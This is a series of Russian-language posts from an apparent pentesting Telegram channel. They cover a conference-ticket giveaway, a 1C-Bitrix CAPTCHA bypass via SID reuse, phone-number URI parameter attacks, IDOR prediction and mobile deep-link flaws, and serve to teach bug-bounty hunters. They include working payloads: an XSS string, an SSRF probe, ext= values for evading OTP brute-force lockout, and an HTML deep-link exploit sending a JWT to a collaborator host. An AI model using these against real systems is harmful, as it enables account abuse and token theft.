⛈ Конкурс | Билет на OFFZONE за 0 рублей

Привет друзья! Я думаю многие знают про конференцию OFFZONE, так вот...
Тут наметился конкурс бесплатной проходки на OFFZONE c поддержкой от платформы BI.ZONE Bug Bounty для вас, подписчиков канала Что-то на пентестерском

Конференция пройдет 24-25 августа в Москве
🟢Если хочешь поучаствовать и испытать удачу - напиши в комментариях под этим постом свой интересный кейс с пентеста / багбаунти, если такого нет - то напиши что затянуло тебя в ИБ или что мотивирует тебя изучать вот это всё, если лень, то просто + поставь. Было бы интересно почитать
🟢Условия такие: если ты напишешь коммент первым - твой номер будет один, если вторым - то второй и т.д.
Далее закину номера в рандомайзер и возможно билет достанется именно тебе, мой дорогой читатель 😉

🟢Увидимся на OFFZONE ®️

📌 ТГ платформы: https://t.iss.one/bizone_bb

ЧТНП | #конкурс

⛈ Исследование | Bypass CAPTCHA 1C-Bitrix

Всем привет! Решил переписать своё старое исследование в более читабельный формат.
Еще давно, у меня был проект на пентест - сайт на 1с-битрикс
В ходе поиска уязвимостей мне попалась капча в стандартной форме аутентификации 1с-битрикс, которая генерировалось вроде бы стандартно
Но я решил её поисследовать и пойти нестандартным путем
Вот что из этого вышло...

🟢Устройство капчи
⬜️ Captcha.php - данный файл отвечает за генерацию SID капчи, обращением к функции GetSID();
⬜️ SID - это что-то наподобие secure id, который нужен для того, чтобы значение капчи в виде слова(fW0j) лежало в html форме не в открытом виде, а в виде SID(0f7e32b13881c476d4d1f7be9796ed42), это нужно чтобы не так легко ее можно было обойти
⬜️ Генерация - после того, как открываешь форму она генерируется, идет GET запрос на captcha.php и получаешь значение в виде картинки и sid значения

🟠Начало исследования
Мне пришло в голову проверить генерацию sid, после того, как обнаружил что sid долгое время оставался живой и не удалялся
Лежал он живой около 4 часов, и подумал я, что если в этот временной промежуток сделать проверку на генерацию одинаковых сидов
Если сгенерируется тот же сид, что и живой, то его можно вставить в запрос и обойти капчу, тк и значение и sid значения мы знаем

🟠Мой коллега помог написать скрипт для GET запроса напрямую к captcha.php, за что спасибо, но такой метод не сработал
Тогда и попробовал сделать скрипт с POST запросом через форму аутентификации
И это сработало...

🔴Обход капчи
⬜️ Отправляем POST запрос на регистрацию нового юзера через python
⬜️ Отправляем его до тех пор, пока не попадется старый sid
⬜️ Если попался старый сид, то зарегистрируется новый юзер и скрипт выведет "ok"
➡️Exploit - Click

📌 Импакт от этого - переполнение базы данных путем создания различных юзеров
Также можно сгенерировать к примеру 10 сидов, что ускорит обход капчи

ЧТНП | #исследования #web

⛈ Всем привет! Для тех, участвует в конкурсе на розыгрыш билета OFFZONE - есть хорошие новости, мы с моим коллегой владельцем, канала Дневник Безопасника решили увеличить ваши шансы на выигрыш.

Всё просто. От вас требуется:
⬜️ Оставить любой комментарий под этим постом и под этим
⬜️ Быть подписанным на Дневник Безопасника и этот канал

📌 До конца розыгрыша осталось: 6 часов 🔥
Ровно в 00:00 по МСК времени 15 числа опубликуем победителя 😎

ЧТНП | #конкурс

Иии победителем в розыгрыше OFFZONE становится @Rusikergo
Поздравим победителя 🎉🎉

⛈ Bug Bounty Blueprint: Руководство для начинающих баг хантеров и веб пентестеров

Данное руководство позволит тебе начать свой путь в мир баг баунти и веб пентеста, закрыть пробелы в знаниях и темах
Пошагово даёт понимание что изучать и на каком этапе, собраны еще и ресурсы где могут обучить хантить бесплатно. Happy hacking 😉

📶 Bug Bounty Blueprint

ЧТНП | #web

⛈ Атаки на механизм ввода номера телефона

Привет! Давай разберемся как найти уязвимости в форме ввода телефона.
Согласно RFC 5341 URI номера телефона может иметь параметры, которые нужны для передачи более точных данных
Чаще всего параметры принимают почтовые сервисы либо веб-приложения в которых отсутствует жесткая валидация номеров.

🟩Пример: параметр phone-context может использоваться для определения того, какой код страны(+7,+1) используется. Если ты зашел на сайт и определился твой город, то при регистрации вводя свой номер телефона, ты можешь вписать свой номер без кода страны т.к. он может подставится в параметр.

🟩Атаки используя параметры:
✅ XSS
+88005553535;phone-context=<script>alert(1)</script>
// Следует поставить в query string параметр в который помещен номер

✅ SSRF
+88005553535;phone-context=burpcollab
// Работает редко, в основном в старых системах

✅ OTP Обход блокировки
+88005553535;ext=0
+88005553535;ext=2
+88005553535;ext=3
// Если заблокировали то подставляем ext с цифрой и продолжаем брутить с того кода, с которого залочили

📌 Более подробно изучить можно тут:
📶 HackTricks

ЧТНП | #web

⛈ IDOR - как предсказать идентификатор

Привет! При тестировании веб приложений, в попытках найти IDOR, ты наверное замечал что существуют разные ID
Так вот, в данном видео рассказывается как предсказывать идентификаторы а также разбираются отчеты с bug bounty где рассказывается как баг хантеры смогли предсказать ID и получить IDOR
Happy hacking 😉

📶 IDOR - how to predict an identifier

ЧТНП | #web

⛈ Android & iOS Deep link vuln

Привет! Сегодня познакомимся с уязвимостями deep link'ов в мобильных приложениях и узнаем как найти в них уязвимости

🟢Deep Link
По сути дип линк нужен для координации или перенаправления в те или иные части мобильного приложения
Нужно это для удобства, ты можешь легко переключаться между приложениями или переходить с веб-сайта на приложение без переключения на само мобильное приложение
У каждого приложения свой дип линк и выглядит примерно так:
➡️ название_приложения://параметр
➡️ keklol://open_document=name

🟢Ищем уязвимости
Уязвимости возникают за счет неправильной обработки параметров из дип линков
Уязвимости могут быть разные в зависимости от того, что за параметр перед вами

➡️ Кейс:
Коллега на работе нашел уязвимость CSRF, данная уязвимость позволяла присылать JWT токен на burp collaborator
⬜️ Сначала ищем параметры дип линка, найти их можно при реверсе самого приложения, либо через утилиту strings
⬜️ Обнаружился параметр URL, который принимал сторонние ссылки
⬜️ Поскольку дип линк это ссылка, значит нужно создать эксплойт в виде простой html страницы с внедрением данного дип линка и его параметра
<a href="keklol://url=https://burp_collab">click</a>
⬜️ После открытия ссылки, на burp collaborator приходит jwt token, раскодировав токен, в нем обнаруживается конфиденциальная информация о пользователе

🟢Заключение
В целом на этом всё, импакт от этого может быть разный, в зависимости от того, что ты получаешь в ответ, если это RCE то критический, если присылаются пользовательские данные - высокий
Если можно заставить пользователя подписаться на какие-то каналы - низкий
Happy hacking ☺️

📌 В качестве дополнительных примеров делюсь полезными ссылками:
📶 RCE через deep link
📶 CSRF в приложении перископ

ЧТНП | #mobile